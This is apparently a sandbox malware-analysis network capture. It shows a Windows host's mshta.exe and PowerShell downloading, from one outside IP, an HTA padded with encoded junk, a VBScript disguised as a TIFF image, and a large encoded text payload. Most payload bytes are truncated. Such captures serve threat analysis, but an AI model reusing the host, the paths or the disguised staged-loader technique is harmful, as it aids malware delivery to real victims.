                                                                                              Oct 24, 2024 21:22:37.665079117 CEST424INData Raw: 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25
                                                                                              Data Ascii: 2520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%
                                                                                              Oct 24, 2024 21:22:37.665113926 CEST1236INData Raw: 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 42 7a 4f 68 74 53 6c 41 7a 65 5a 56 6f 65 6f 78 4a 5a 79 41 56 6e 58 76 70 61 6b 77 75 47 56 55 77
                                                                                              Data Ascii: %252520%252520%252520%252520%252520%252520%252520BzOhtSlAzeZVoeoxJZyAVnXvpakwuGVUwBHNTnznvSkPcvqnzVOuNlIDiDjGtZZlRmIhtQzhisyOPfDJJRoZNXqcnILtYObRBpUijMLDCmQNPoDgexZjkEzosZTDwgFkqtsMEhKXqioIqfRZyvXTtpKInkHgemkJYgdPSkaJoPTsHNVKErkZCmxFLVeXjltKoi
                                                                                              Oct 24, 2024 21:22:37.665150881 CEST1236INData Raw: 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32
                                                                                              Data Ascii: 252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%25252
                                                                                              Oct 24, 2024 21:22:37.665184975 CEST1236INData Raw: 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35
                                                                                              Data Ascii: 20%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%25
                                                                                              Oct 24, 2024 21:22:37.665220022 CEST1236INData Raw: 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30
                                                                                              Data Ascii: 52520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520
                                                                                              Oct 24, 2024 21:22:37.665307045 CEST1236INData Raw: 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25
                                                                                              Data Ascii: 2520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%
                                                                                              Oct 24, 2024 21:22:37.665344954 CEST1060INData Raw: 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35
                                                                                              Data Ascii: %252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%2525
                                                                                              Oct 24, 2024 21:22:37.665411949 CEST1236INData Raw: 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25
                                                                                              Data Ascii: 2520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%
                                                                                              Oct 24, 2024 21:22:37.671220064 CEST1236INData Raw: 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35
                                                                                              Data Ascii: %252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%2525


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              1192.168.2.2249166192.3.176.141803868C:\Windows\System32\mshta.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              Oct 24, 2024 21:22:42.559612989 CEST459OUTGET /35/ou/nicegirlwithnewthingswhichevennobodknowthatkissingme.hta HTTP/1.1
                                                                                              Accept: */*
                                                                                              Accept-Language: en-US
                                                                                              UA-CPU: AMD64
                                                                                              Accept-Encoding: gzip, deflate
                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                              Range: bytes=8896-
                                                                                              Connection: Keep-Alive
                                                                                              Host: 192.3.176.141
                                                                                              If-Range: "20a11-6252e32d56015"
                                                                                              Oct 24, 2024 21:22:43.229069948 CEST1236INHTTP/1.1 206 Partial Content
                                                                                              Date: Thu, 24 Oct 2024 19:22:42 GMT
                                                                                              Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                              Last-Modified: Thu, 24 Oct 2024 00:36:51 GMT
                                                                                              ETag: "20a11-6252e32d56015"
                                                                                              Accept-Ranges: bytes
                                                                                              Content-Length: 124753
                                                                                              Content-Range: bytes 8896-133648/133649
                                                                                              Keep-Alive: timeout=5, max=100
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: application/hta
                                                                                              Data Raw: 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 [TRUNCATED]
                                                                                              Data Ascii: %252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%25253A%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%
                                                                                              Oct 24, 2024 21:22:43.229163885 CEST1236INData Raw: 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32
                                                                                              Data Ascii: 252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%25252
                                                                                              Oct 24, 2024 21:22:43.229202986 CEST1236INData Raw: 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35
                                                                                              Data Ascii: 20%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%25
                                                                                              Oct 24, 2024 21:22:43.229238033 CEST1236INData Raw: 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32
                                                                                              Data Ascii: 0%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252
                                                                                              Oct 24, 2024 21:22:43.229274035 CEST848INData Raw: 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25
                                                                                              Data Ascii: 2520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%
                                                                                              Oct 24, 2024 21:22:43.229309082 CEST1236INData Raw: 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32
                                                                                              Data Ascii: 252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%25252
                                                                                              Oct 24, 2024 21:22:43.229345083 CEST1236INData Raw: 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35
                                                                                              Data Ascii: 20%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%25
                                                                                              Oct 24, 2024 21:22:43.229381084 CEST1236INData Raw: 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30
                                                                                              Data Ascii: 52520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520
                                                                                              Oct 24, 2024 21:22:43.229415894 CEST1236INData Raw: 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32
                                                                                              Data Ascii: 0%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252
                                                                                              Oct 24, 2024 21:22:43.229453087 CEST1236INData Raw: 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35
                                                                                              Data Ascii: 20%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%25
                                                                                              Oct 24, 2024 21:22:43.235363007 CEST1236INData Raw: 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30 25 32 35 32 35 32 30
                                                                                              Data Ascii: 52520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520%252520


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              2192.168.2.2249167192.3.176.141804008C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              Oct 24, 2024 21:22:53.355494976 CEST367OUTGET /35/educationalthingswithgreatattitudeonhere.tIF HTTP/1.1
                                                                                              Accept: */*
                                                                                              UA-CPU: AMD64
                                                                                              Accept-Encoding: gzip, deflate
                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                              Host: 192.3.176.141
                                                                                              Connection: Keep-Alive
                                                                                              Oct 24, 2024 21:22:54.029520988 CEST1236INHTTP/1.1 200 OK
                                                                                              Date: Thu, 24 Oct 2024 19:22:53 GMT
                                                                                              Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                              Last-Modified: Thu, 24 Oct 2024 00:24:03 GMT
                                                                                              ETag: "2273e-6252e050a6f64"
                                                                                              Accept-Ranges: bytes
                                                                                              Content-Length: 141118
                                                                                              Keep-Alive: timeout=5, max=100
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: image/tiff
                                                                                              Data Raw: ff fe 70 00 72 00 69 00 76 00 61 00 74 00 65 00 20 00 66 00 75 00 6e 00 63 00 74 00 69 00 6f 00 6e 00 20 00 43 00 72 00 65 00 61 00 74 00 65 00 53 00 65 00 73 00 73 00 69 00 6f 00 6e 00 28 00 77 00 73 00 6d 00 61 00 6e 00 2c 00 20 00 63 00 6f 00 6e 00 53 00 74 00 72 00 2c 00 20 00 6f 00 70 00 74 00 44 00 69 00 63 00 2c 00 20 00 61 00 6d 00 6f 00 72 00 66 00 61 00 6e 00 68 00 61 00 72 00 29 00 0d 00 0a 00 20 00 20 00 20 00 20 00 64 00 69 00 6d 00 20 00 64 00 65 00 73 00 61 00 6d 00 6f 00 72 00 74 00 69 00 7a 00 61 00 72 00 46 00 6c 00 61 00 67 00 73 00 0d 00 0a 00 20 00 20 00 20 00 20 00 64 00 69 00 6d 00 20 00 63 00 6f 00 6e 00 4f 00 70 00 74 00 20 00 0d 00 0a 00 20 00 20 00 20 00 20 00 64 00 69 00 6d 00 20 00 64 00 65 00 73 00 61 00 6d 00 6f 00 72 00 74 00 69 00 7a 00 61 00 72 00 0d 00 0a 00 20 00 20 00 20 00 20 00 64 00 69 00 6d 00 20 00 61 00 75 00 74 00 68 00 56 00 61 00 6c 00 0d 00 0a 00 20 00 20 00 20 00 20 00 64 00 69 00 6d 00 20 00 65 00 6e 00 63 00 6f 00 64 00 69 00 6e 00 67 00 56 00 61 00 [TRUNCATED]
                                                                                              Data Ascii: private function CreateSession(wsman, conStr, optDic, amorfanhar) dim desamortizarFlags dim conOpt dim desamortizar dim authVal dim encodingVal dim encryptVal dim pw dim tout ' proxy information dim proxyAccessType dim proxyAccessTypeVal dim proxyAuthenticationMechanism dim proxyAuthenticationMechanismVal dim proxyUsername dim proxyPassword desamortizarFlags = 0 pr
                                                                                              Oct 24, 2024 21:22:54.029572010 CEST1236INData Raw: 00 6f 00 78 00 79 00 41 00 63 00 63 00 65 00 73 00 73 00 54 00 79 00 70 00 65 00 20 00 3d 00 20 00 30 00 0d 00 0a 00 20 00 20 00 20 00 20 00 70 00 72 00 6f 00 78 00 79 00 41 00 63 00 63 00 65 00 73 00 73 00 54 00 79 00 70 00 65 00 56 00 61 00 6c
                                                                                              Data Ascii: oxyAccessType = 0 proxyAccessTypeVal = 0 proxyAuthenticationMechanism = 0 proxyAuthenticationMechanismVal
                                                                                              Oct 24, 2024 21:22:54.029608965 CEST1236INData Raw: 00 66 00 20 00 4c 00 43 00 61 00 73 00 65 00 28 00 65 00 6e 00 63 00 6f 00 64 00 69 00 6e 00 67 00 56 00 61 00 6c 00 29 00 20 00 3d 00 20 00 22 00 75 00 74 00 66 00 2d 00 38 00 22 00 20 00 74 00 68 00 65 00 6e 00 0d 00 0a 00 20 00 20 00 20 00 20
                                                                                              Data Ascii: f LCase(encodingVal) = "utf-8" then desamortizarFlags = desamortizarFlags OR wsman.SessionFlagUTF8
                                                                                              Oct 24, 2024 21:22:54.029643059 CEST636INData Raw: 00 66 00 0d 00 0a 00 0d 00 0a 00 20 00 20 00 20 00 20 00 69 00 66 00 20 00 6f 00 70 00 74 00 44 00 69 00 63 00 2e 00 41 00 72 00 67 00 75 00 6d 00 65 00 6e 00 74 00 45 00 78 00 69 00 73 00 74 00 73 00 28 00 4e 00 50 00 41 00 52 00 41 00 5f 00 55
                                                                                              Data Ascii: f if optDic.ArgumentExists(NPARA_USESSL) then ASSERTBOOL optDic.ArgumentExists(NPARA_REMOTE), "The '-
                                                                                              Oct 24, 2024 21:22:54.029679060 CEST1236INData Raw: 00 74 00 73 00 28 00 4e 00 50 00 41 00 52 00 41 00 5f 00 41 00 55 00 54 00 48 00 29 00 20 00 74 00 68 00 65 00 6e 00 0d 00 0a 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 41 00 53 00 53 00 45 00 52 00 54 00 4e 00 41 00 4c 00 28 00 4e 00 50
                                                                                              Data Ascii: ts(NPARA_AUTH) then ASSERTNAL(NPARA_AUTH) authVal = optDic.Argument(NPARA_AUTH) select case LC
                                                                                              Oct 24, 2024 21:22:54.029767990 CEST1236INData Raw: 00 50 00 41 00 52 00 41 00 5f 00 50 00 41 00 53 00 53 00 57 00 4f 00 52 00 44 00 20 00 26 00 20 00 22 00 27 00 20 00 6f 00 70 00 74 00 69 00 6f 00 6e 00 20 00 69 00 73 00 20 00 6f 00 6e 00 6c 00 79 00 20 00 76 00 61 00 6c 00 69 00 64 00 20 00 66
                                                                                              Data Ascii: PARA_PASSWORD & "' option is only valid for '-auth:none'" case VAL_BASIC 'Use -username and
                                                                                              Oct 24, 2024 21:22:54.029805899 CEST1236INData Raw: 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 41 00 53 00 53 00 45 00 52 00 54 00 42 00 4f 00 4f 00 4c 00 20 00 6f 00 70 00 74 00 44 00 69 00 63 00 2e 00 41 00 72 00 67 00 75 00 6d 00 65 00 6e 00 74 00 45 00 78 00 69
                                                                                              Data Ascii: ASSERTBOOL optDic.ArgumentExists(NPARA_USERNAME), "The '-" & NPARA_USERNAME & "' option must be specified for
                                                                                              Oct 24, 2024 21:22:54.029843092 CEST1236INData Raw: 00 6f 00 73 00 27 00 22 00 0d 00 0a 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 64 00 65 00 73 00 61 00 6d 00 6f 00 72 00 74 00 69 00 7a 00 61 00 72 00 46 00 6c 00 61 00 67 00 73 00 20 00 3d
                                                                                              Data Ascii: os'" desamortizarFlags = desamortizarFlags OR wsman.SessionFlagUseKerberos case VAL_NEGOTIA
                                                                                              Oct 24, 2024 21:22:54.029880047 CEST1236INData Raw: 00 27 00 22 00 0d 00 0a 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 20 00 27 00 2d 00 75 00 73 00 65 00 72 00 6e 00 61 00 6d 00 65 00 20 00 6f 00 72 00 20 00 2d 00 70 00 61 00 73 00 73 00 77 00 6f
                                                                                              Data Ascii: '" '-username or -password must not be used ASSERTBOOL not optDic.ArgumentExists(NPARA_
                                                                                              Oct 24, 2024 21:22:54.029917002 CEST1236INData Raw: 00 6c 00 61 00 67 00 20 00 27 00 22 00 20 00 26 00 20 00 61 00 75 00 74 00 68 00 56 00 61 00 6c 00 20 00 26 00 20 00 22 00 27 00 20 00 68 00 61 00 73 00 20 00 61 00 6e 00 20 00 69 00 6e 00 76 00 61 00 6c 00 69 00 64 00 20 00 76 00 61 00 6c 00 75
                                                                                              Data Ascii: lag '" & authVal & "' has an invalid value." ASSERTBOOL optDic.ArgumentExists(NPARA_USERNAME), "The '-"
                                                                                              Oct 24, 2024 21:22:54.035921097 CEST1236INData Raw: 00 65 00 6e 00 64 00 20 00 69 00 66 00 0d 00 0a 00 20 00 20 00 20 00 0d 00 0a 00 20 00 20 00 20 00 20 00 69 00 66 00 20 00 6f 00 70 00 74 00 44 00 69 00 63 00 2e 00 41 00 72 00 67 00 75 00 6d 00 65 00 6e 00 74 00 45 00 78 00 69 00 73 00 74 00 73
                                                                                              Data Ascii: end if if optDic.ArgumentExists(NPARA_USERNAME) then ASSERTBOOL not optDic.ArgumentExists(NPARA_CERT),


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              3192.168.2.2249170192.3.176.141801224C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              Oct 24, 2024 21:23:22.433092117 CEST77OUTGET /35/SMLPERR.txt HTTP/1.1
                                                                                              Host: 192.3.176.141
                                                                                              Connection: Keep-Alive
                                                                                              Oct 24, 2024 21:23:23.087599039 CEST1236INHTTP/1.1 200 OK
                                                                                              Date: Thu, 24 Oct 2024 19:23:22 GMT
                                                                                              Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                              Last-Modified: Thu, 24 Oct 2024 00:19:43 GMT
                                                                                              ETag: "22aac-6252df5835df3"
                                                                                              Accept-Ranges: bytes
                                                                                              Content-Length: 141996
                                                                                              Keep-Alive: timeout=5, max=100
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: text/plain
                                                                                              Data Raw: 3d 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 [TRUNCATED]
                                                                                              Data Ascii: =AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                              Oct 24, 2024 21:23:23.087626934 CEST1236INData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
